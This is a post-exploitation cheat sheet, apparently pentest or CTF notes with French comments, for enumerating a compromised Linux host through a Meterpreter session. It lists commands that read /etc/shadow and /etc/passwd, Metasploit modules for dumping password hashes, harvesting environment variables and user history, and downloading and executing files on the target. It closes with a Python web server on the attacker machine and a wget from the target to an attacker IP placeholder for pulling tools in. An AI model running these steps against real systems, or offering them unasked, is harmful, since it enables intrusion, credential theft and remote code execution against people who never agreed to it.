meterpreter> sysinfo #info systeme
#bash commands
hostname
cat /etc/*release
cat /etc/issue
uname -a
cat /proc/version
lscpu
lsblk
df -h
mount -l
dpkg -l | rpm -qa
printenv
free -h
meterpreter> getuid
#bash commands
whoami
id
groups <username>
cat /etc/passwd
cat /etc/group
cat /etc/shadow
who
last
lastlog
meterpreter> ifconfig
meterpretr> netstat -tulnp
meterpreter> route
# ou netstat -rn
meterpreter> arp -a
#bash
ip a s
cat /etc/networks #plus lisible !
cat /etc/hostname #Target network name
cat /etc/hosts #IP/name resolution
cat /etc/resolv.conf #dns
resolvectl
ss -tulnp #processes
route
arp -a
meterpreter> ps
#bash
ps -ef | aux
top
crontab -l
cat /etc/cron
ls -al /etc/cron*
post/linux/gather/enum_configs
# Recueille les configurations système type SELINUX / Apparmor pour l'analyse de l'environnement.
post/multi/gather/env
# Récupère les variables d'environnement, potentiellement sensibles.
post/linux/gather/enum_network
# Collecte les informations réseau pour analyser les connexions et interfaces.
post/linux/gather/enum_protections
# Vérifie les protections de sécurité actives sur le système.
post/linux/gather/enum_system
# Récupère des informations générales sur le système cible.
post/linux/gather/checkcontainer
# Détecte si le système est exécuté dans un conteneur.
post/linux/gather/checkvm
# Vérifie si la machine est virtuelle, ce qui influence les attaques.
post/linux/gather/enum_users_history
# Récupère l'historique des utilisateurs et des commandes exécutées.
post/linux/gather/hashdump
# Extrait les mots de passe hachés des utilisateurs du système.
msf> loot
# Affiche les informations et fichiers collectés lors de l'exploitation.
post/multi/manage/system_session
# Permet de gérer et contrôler les sessions système ouvertes.
post/linux/manage/download_exec
# Télécharge et exécute des fichiers sur la machine cible.
https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
python -m http.server 80 #python3 web server on Attacker
python -m SimpleHTTPServer 80 #python2
wget http://<attacker_IP>/<filename> #download from Linux target